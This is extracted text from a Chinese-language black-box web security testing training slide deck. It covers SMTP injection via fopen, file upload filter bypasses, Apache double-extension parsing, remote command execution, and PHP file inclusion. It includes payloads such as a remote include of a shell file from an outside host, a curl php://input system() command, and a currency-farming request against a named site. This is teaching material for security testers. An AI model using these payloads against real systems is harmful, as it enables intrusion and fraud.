黑盒安全检测培训.PPT

GET / HTTP/1.0HELO MAIL FROM:mengzhuo@RCPT TO:xxx@DATACRLF is here.QUITHTTP/1.0Host: :25… … WEB常规检测 Warning: fopen(http://...@ RCPT TO:mengzhuo@ DATA CRLF is here . QUIT ) [function.fopen]: failed to open stream: HTTP request failed! 220 -- Server ESMTP (Sun Java System Messaging Server 6.2-3.04 (built Jul 15 2005)) in /opt/lampp/htdocs/doc.php on line 3 由于SMTP服务器进制匿名发送邮件,这个测试对方是收不到邮件的,但是已经证明了攻击的存在性,攻击者非法请求了,并尝试发送邮件. WEB常规检测 WEB常规检测 文件上传攻击由于上传流程没有对文件类型做足够的检查,导致黑客直接上传一个webshell. 文件上传攻击危害 WEB下很多黑客攻击的最终结果就是一个webshell,所以文件上传攻击等于直接沦陷了WEB系统. 黑盒测试方法猜测程序处理流程,构造后缀或修改POST数据. WEB常规检测 精心构造后缀 (php3,PhP,php.) 构造文件类型 Content-Type 截断程序流程 (shell.php%00.jpg) 服务器解析缺陷 (test.php.rar) GIF89a WEB常规检测 JS的协同艺术—灰盒检测 function isAllowedAttach(sFile) { var sUploadImagesExt = .jpg .gif .png; var sExt = sFile.match( /\.[^\.]*$/ ) ; if (sExt) { sExt = sExt[0].toLowerCase(); } else { … … if(!isAllowedAttach(file)){ show_error(上传图片格式不正确,upinfo); return false; } WEB常规检测 WEB常规检测 为什么rar会被php解析? 每遇到一种后双重后缀名(如xxx.php.rar)的文件,Apache都会去conf/mime.types 文件中检查最后一个后缀,如果最后一个后缀并没有在mime.types文件中定义, 则使用前一个后缀来解释 ,因为在默认情况下,rar并未在mime.types中定义, 故Apache会使用php后缀来解释文件, 这就是漏洞的原因所在. 远程命令执行顾名思义,就是攻击者远程像操作自己电脑一样向远程服务器发送shell命令并得到回显. 远程命令执行危害 危害远远大于webshell,而且继承权限. 黑盒测试方法利用截断或者直接输入shell命令或可执行代码. 演示 WEB常规检测 WEB常规检测 远程代码执行(perg_replace) WEB常规检测 远程命令执行(NULL妙用) 文件包含漏洞(PHP)由于文件名(路径)参数过滤不严,导致攻击者可以包含本地(远程)任意的文件或代码被执行. 文件包含漏洞危害 因为包含进来的文件(代码)会在当前前文件中被执行,所以等于得到了webshell,同时本地文件还会因为包含而泄露源代码. 黑盒测试方法构造文件名参数为本地或远程的代码路径. WEB常规检测 WEB常规检测 如果txt是可执行的代码,将被包含到本程序并执行. file.php?filename=http://xxx/shell.txt%3f 或者直接执行命令. bash# curl http://xxx/file.php –d path=php://input?system(ls);? 演示 WEB常规检测 本地文件读取 WEB常规检测 本地代码包含 WEB常规检测 远程代码包含 WEB常规检测 远程命令执行 WEB常规检测 其他我们不想看到的程序执行结果 新浪圈子争车位我为车狂刷汽车币漏洞 POST /go/csupdate.do?t=2id=1zlutw282g5civ8hsinauid=1285413565 HTTP/1.1 ..... http头信息 ..... Data数据(兑换一个汽车币): ?xml version=1.0”encoding=UTF-8? requestpkey8a2